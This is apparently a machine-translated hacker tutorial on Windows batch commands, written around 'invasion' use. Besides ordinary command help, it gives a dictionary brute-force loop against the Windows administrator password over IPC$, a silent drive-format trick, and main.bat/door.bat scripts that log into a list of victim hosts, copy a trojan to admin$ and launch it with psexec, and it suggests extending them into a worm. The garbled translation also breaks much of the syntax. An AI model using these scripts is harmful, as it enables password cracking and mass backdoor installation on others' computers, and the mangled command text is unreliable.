1. Simple batch internal order profile
1.echo command
Open the echo or close the request back function, or display the message. If there is no parameters, the echo command will display the current echo setting.
grammar
echo [{on | OFF}] [Message]
Sample: @echo off / echo hello world
In practical applications, we will combine this command and redirect symbol (also known as pipe symbols, generally >> ^) to implement the input of some commands to specific formats. This will be embodied in the later example .
2. @ 令
Indicates that @ later commands, in the invasion process (for example, using batch to format the enemy's hard drive) naturally not let the other party see the command you use.
Sample: @echo off
@echo now initializing the program, please wait a minite ...
@format x: / q / u / autoset (format This command is not available / y this parameter, gratifying that Microsoft has left an Autoset parameter to us, the effects and / Y are the same.)
3.goto command
The specified jump to the label. After finding the label, the program will process the command starting from the next row.
Syntax: goto label (Label is the parameter, specifies the row in the batch program to be turned.)
Sample:
IF {% 1} == {} GOTO NOPARMS
IF {% 2} == {} goto noparms (if you don't understand, you don't understand, you will have a detailed explanation.)
@Rem Check Parameters if Null show usage
: NopArms
Echo usage: Monitor.bat Serverip portnumber
Goto end
The name of the label can be random, but it is best to make a meaningful letter, let me add one: used to indicate that this letter is a label, and the goto command is based on this: to find the next step to jump there. It is best to have some explanation that you will understand your intentions.
4.Rem Command
Comment command, quite with / * in the C language -------- * /, which does not be executed, just a role of a comment, easy to read and modify it later.
Rem message
Sample: @Rem Here Is The Description.
5.pause command
When you run the PAUSE command, the following message is displayed:
..
Sample:
@echo off
: Begin
Copy a: *. * D: / back
Echo please put a new disk Into Driver A
PAUSE
Goto Begin
In this example, all files on the disk A in the drive A are copied to the D: / BACK. Display Note Tips When another disk is placed in the drive A, the PAUSE command will hang the program so that you can replace the disk and press any key to continue processing.
6.call command
Another batch program is called from a batch program and does not terminate the parent batch program. The call command accepts the label used as calling the target. If you use Call outside the script or batch file, it will not work on the command line.
grammar
Call [[Drive:] [PATH] FileName [BatchParameters]] [: label [arguments]]]]]
parameter
[Drive:} [PATH] FileName
Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.
7.Start command
Call external programs, all DOS commands and command line programs can be called by the start command.
Intrusion common parameters:
MIN starts when the window is minimized
Separate starts 16-bit Windows programs within separate spaces
High at the High Priority Category Start Application
RealTime starts an application at the RealTime priority category
Wait launches the app and waits it over
Parameters These are parameters transmitted to command / programs
When the execution application is a 32-bit GUI application, the cmd.exe does not equal the application to terminate the command prompt. If executed within the command script, the new behavior will not happen.
8.choice command
Choice Use this command to allow users to enter a character to run different commands. When using, you should add / c: parameters, C: After you should write the prompt that the characters can be entered, there is no space. Its return code is 1234 ...
Such as: Choice / C: DME DEFRAG, MEM, END
Will display
DEFRAG, MEM, END [D, M, E]?
Sample:
The contents of Sample.bat are as follows:
@echo off
Choice / C: DME DEFRAG, MEM, END
IF Errorlevel 3 Goto Defrag (should judge the highest value of the value first)
IF Errorlevel 2 Goto Mem
IF Errotlevel 1 goto end
: defrag
C: / DOS / DEFRAG
Goto end
: MEM
MEM
Goto end
: END: END
Echo good bye
After this file runs, the DEFRAG, MEM, END [D, M, E]? The user can select DME, then the IF statement will make a judgment, and D represents the block segment executing the label DEFRAG, and M represents the program that is labeled MEM. Segment, e represents a block that executes the label End, and each block is finally jumped to the END Number with Goto End, and then the program will display good Bye and the file ends.
9.if Command
The if indicates whether it is determined whether or not the specified condition is determined to determine the execution of different commands. There are three formats:
1, if "parameter" == "string" The command to be executed
If the parameter is equal to the specified string, the condition is established, run the command, otherwise run the next sentence. (Note is two equal numbers)
If IF "% 1" == "a" Format A:
IF {% 1} == {} GOTO NOPARMS
IF {% 2} == {} GOTO NOPARMS
2, if the ife file name to be executed
If you have a specified file, the condition is true, run the command, otherwise run the next sentence.
If exist config.sys edit config.sys
3, if ErrorleVel / if Not Errorlevel Digital Terminal To Perform
If the return code is equal to the specified number, the condition is established, run the command, otherwise run the next sentence.
If Errorlevel 2 Goto X2
The DOS program runs back a number to DOS, called error code errorlevel or returns, and the common return code is 0, 1.
10.FOR command
The for command is a complicated command, primarily for parameters to loop execute commands within the specified range.
When using the for command in the batch file, specify the variable, please use %% variablefor {% variable | %% variable} in (set) do command [commandLineOptions]
% variable specifies a single letter replaceable parameter.
(SET) Specify one or a set of files. You can use wildcards.
Command specifies the command to execute each file.
Command-parameters specifies parameters or command line switches for a specific command.
When using the for command in the batch file, specify a variable, please use %% Variable
Not to use% Variable. The variable name is case sensitive, so% I is different from% i
If the command extension is enabled, the following additional for command format will be
stand by:
FOR / D% Variable in (SET) Do Command [Command-Parameters]
If the centralized contains a wildcard, specify matching with the directory name without with the file.
Name match.
FOR / R [[DRIVE:] PATH]% Variable in (set) Do Command [Command "
Check to [Drive:] Path is the directory tree of the root, pointing to each directory.
FOR statement. If there is no specified directory after / r, use the current
table of Contents. If the set is only one single point (.) Character, the directory tree is enumerated.
FOR / L% Variable in (Start, Step, End) Do Command [Command-Para
This set represents a digital sequence from the beginning to the end in incremental form.
Therefore, (1, 1, 5) will produce sequences 1 2 3 4 5, (5, -1, 1) will result
Sequence (5 4 3 2 1).
FOR / F ["Options"]% Variable in (file-set) Do Command
FOR / F ["Options"]% variable in ("string") Do Command
FOR / F ["Options"]% Variable in (Command) Do Command
Or, if there is a UseBackQ option:
FOR / F ["Options"]% Variable in (file-set) Do Command
FOR / F ["Options"]% variable in ("string") Do Command
FOR / F ["Options"]% Variable in (Command) Do Command
Filenameset is one or more file names. Continue to Filenameset
Before the next file, each file has been opened, read and processed.
Processing includes reading a file, dividing it into a line of rows, and then
Analyze into zero or more symbols. Then use the symbol string variable value
Call the for loop. With the default, / f is separated from each line of each file
The first blank symbol. Skip blank lines. You can choose Options "by specifying
Parameter replacing the default parsing operation. This string with quotes includes one or more
Specify the keywords for different parsing options. These keywords are:
EOL = C - Refers to the end of a row bet release character (one)
Skip = n - refers to the number of rows ignored at the beginning of the file.
Delims = xxx - Indicator jacket set. This replacement space and jumping
Default separator set.
Tokens = x, y, m-n - means which symbols per line are passed to each iteration
For itself. This can cause the additional variable name
The format is a range. Specify M via NTH symbol
The last character in the symbol string is asterisk,
So extra variables will be parsed in the last symbol
Allocate and accept the retention text.
Usebackq - Specify new grammar has been used under the case:
Perform a back quoted string as a command and
Quatrical characters are text string commands and allowed in FI
Use dual quotes to expand the file name.
Sample1:
FOR / F "eol =; tokens = 2, 3 * delims =,"% i in (myfile.txt) do command
Will analyze each row in myfile.txt, ignore those rows that are headed by semicolons,
The second and third symbols in each row are passed to the For Prproduction; with a tune and / or
Space symbol symbol. Please note that the statement of this FOR program references% i
Take the second symbol, reference% J to get the third symbol, reference% K
To get all the remaining symbols after the third symbol. For files with spaces
Name, you need to enclose the file with double quotes. In this way
With double quotes, you also need to use the UseBackQ option, otherwise, the double quotes will
Understanding is used as a string that defines a certain analysis.
% i specifically in the For statement,% J and% K are passed
The tokens = option is specifically description. You can pass tokens = line
Specify up to 26 symbols, as long as you don't try to explain one higher than the letter z or
Z of the variable. Remember, for variables are single letters, case sensitive and global;
At the same time, there is no more than 52 or more.
You can also use FOR / F analysis logic on adjacent strings;
Enclose the filenameset between brackets with a single quotation. This way, this character
Plan will be regarded as a single input line in a file.
Finally, you can use the for / f command to analyze the output of the command. The method is
The filenameset between brackets becomes a hind string. This string will
It is regarded as a command line, passes to a sub-cmd.exe, and its output will be grasp
Memory and is used as a file analysis. Therefore, the following examples:
FOR / F "USEBACKQ DELIMS =="% i in (`set`) do @echo% i
Will enumerate the name of the environment variable in the current environment.
In addition, the replacement of the FOR variable reference has been enhanced. You can now use the following
Option syntax:
~ I - Delete any quotes ("), expand% i
% ~ Fi - expand% i to a fully qualified path name
% ~ Di - expand% i to a drive letter
% ~ Pi - expand% i to a path
% ~ Ni - expand% i to a file name
% ~ xi - expand% i to a file extension
% ~ Si - The extended path only contains a short name
% ~ AI - expand% i to file properties
% ~ Ti - expand% i to file date / time
% ~ zi - expand% i to the size of the file
% ~ $ PATH: I - Find the directory column of path environment variables and expand% i
The first completely qualified name found. If the environment variable
Not defined, or if the file is not found, this combination key will expand
Nicker
Multiple results can be combined to get multiple results:
% ~ DPI - expand% i to a drive letter and path
% ~ NXI - expand% i to a file name and extension
% ~ fsi - expand% i to a full path name with a short name
% ~ DP $ PATH: I - Find the directory column in the path environment variable and expand% i
To the first drive letter and path found.
% ~ ftzai - expand% i to Dir from similar output lines
In the above example,% I and PATH can be replaced with other effective values. % ~ Grammar
Terminate with an effective FOR variable name. Select a larger write variable name similar to% I
Read more readily, and avoid confusion with a combination of regardless of case. The above is the official help of MS, let's take a few examples to specify the use of the for command in the invasion.
Sample2:
Use the for command to achieve the crack of violent password for a target Win2k host.
We use NET USE // IP / IPC $ "Password" / u: "administrator" to attempt to connect with the target host, and write a password when successful.
The most important order is a: FOR / F I% in (Dict.txt) Do Net USE // IP / IPC $ "I%" / u: "administrator"
Use I% to represent the password of Admin, this is connected to the value of the I% in Dict.txt. Then pass the program to run the result to the find command -
FOR / FI %% in (Dict.txt) DO NET USE // IP / IPC $ "I %%" / u: "Administrator" | Find ": command successfully complete" >> D: /ok.txt, so Ko.
Sample3:
Have you ever had a lot of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it.
The main order is only one: (when using the for command in the batch file, specify the variable using %% variable)
@for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do start call door.bat %% i %% J %% K
For use, please refer to Sample1 above, where it represents the parameter% I% J% K in door.bat in order.
CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file.
Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName.
Code prototype:
--------------- Cut Here The Save As a Batchfile (I Call it main.bat) -------------------- -------
@echo off
@IF "% 1" == "" GOTO USAGE
@for / f "tokens = 1, 2, 3 delims =" %% i in (Victim.txt) do start call ipchack.bat %% i %% J %% K
@goto end
: USAGE
@echo run this bath in dos mode.or Just Double-Click IT.
: END: END
--------------- Cut Here The Save As a Batchfile (I Call it main.bat) -------------------- -------------------------- Cut Here The Save as a batChfile (i call it door.bat) --------- --------------------
@NET USE / /% 1 / IPC $% 3 / U: "% 2"
@if Errorlevel 1 Goto Failed
@echo trying to establish the ipc $ connection ............ ok
@copy windrv32.exe //% 1 / admin $ / system32 && if not errorlevel 1 echo ip% 1 user% 2 PWD% 3 >> KO.TXT
@PSexec //% 1 C: /Winnt/System32/Windrv32.exe
@PSEXEC / /% 1 NET Start Windrv32 && if Not Errorlevel 1 Echo% 1 Backdooored >> Ko.txt
: Failed
@echo sorry can not connect to the VICTIM.
----------------- Cut Here Ten Save as a batChfile (i call it door.bat) ------------------ ----------------
This is just a prototype, two batch and latte programs (Windrv32.exe), psexec.exe, need to be placed in a unified directory. Batch content
It cannsterately expand, for example, add the ability to clear the log DDOS, add the function of the timed to add the user, more deeper, can make it automatically propagated (worm). Not much narrative, interested friends can study.
NO.2
II. How to use parameters in batch files
Parameters can be used in batches, usually from 1% to 9%, when there are multiple parameters, you need to move with Shift, this situation is not very common, we don't consider it.
Sample1: fomat.bat
@echo off
IF "% 1" == "a" Format A:
: Format
@format a: / q / u / auotset
@echo please insert Another Disk to Driver A.
@pause
@goto fomat
This example is used to continuously format a few floppy disks, so you need to enter fomat.bat a at the DOS window when you use it, huh, it seems to have a bit drawing the snake to add ~ ^ _ ^
Sample2:
When we want to build an IPC $ Connection, you must always enter a big string command. If we can't get it wrong, we better write some fixed commands to a batch, put the broiler IP password username to assign it to the parameters. This batch, so you don't have to play a command every time.
@echo off
@NET USE / / 1% / IPC $ "2%" / u: "3%" Note Oh, this PASSWORD is the second parameter.
@if Errorlevel 1 Echo Connection Faled
How is it, use the parameters or simpler? You must learn to learn ^ _ ^. No.3
3. How to use a combination command (Compound Command)
1.&
USAGE: The first command & second command [& Article 3 Commands ...] Use this method to execute multiple commands at the same time, regardless of whether the command is successful
Sample:
C: /> DIR Z: & DIR C: / EX4RCH
The System Cannot Find The path specified.
Volume in Drive C Has No Label.
Volume Serial Number IS 0078-59FB
Directory of C: / EX4RCH
2002-05-14 23:51
.
2002-05-14 23:51
.
2002-05-14 23:51 14 Sometips.gif
2.&&
USAGE: The first command && second order [&& Article 3 Commands ...]
In this way, multiple commands can be performed simultaneously. When you encounter an error, you will not perform the back command, if there is no error, you have been executed all commands;
Sample:
C: /> DIR Z: && Dir C: / EX4RCH
The System Cannot Find The path specified.
C: /> DIR C: / EX4RCH && DIR Z:
Volume in Drive C Has No Label.
Volume Serial Number IS 0078-59FB
Directory of C: / EX4RCH
2002-05-14 23:55
.
2002-05-14 23:55
.
2002-05-14 23:55 14 Sometips.gif
1 File (s) 14 bytes
2 DIR (s) 768, 671, 744 bytes Free
The System Cannot Find The path specified.
This may be relatively simple when doing backups, such as:
Dir file: //192.168.0.1/database/backup.mdb && copy file: //192.168.0.1/database/backup.mdb E: / backup
If there is a backup.mdb file on the remote server, the copy command is executed if it does not exist that the copy command is not executed. This usage can be replaced if exist :)
3. ||
USAGE: The first command || Second order [|| Article 3 Commands ...]
In this way, multiple commands can be performed simultaneously. When you encounter the correct command, you will not execute the back command. If you do not have a correct command, you have been executed all commands;
Sample:
C: / EX4RCH> DIR Sometips.gif || Del Sometips.gif
Volume in Drive C Has No Label.
Volume Serial Number IS 0078-59FB
Directory of C: / EX4RCH
2002-05-14 23:55 14 Sometips.gif
1 File (s) 14 bytes
0 DIR (s) 768, 696, 320 bytes Free
Examples of combined commands:
SAMPLE:
@Copy Trojan.exe //% 1 / Admin $ / SYSTEM32 && IF NOT Errorlevel 1 Echo IP% 1 User% 2 Pass% 3 >> Victim.txt
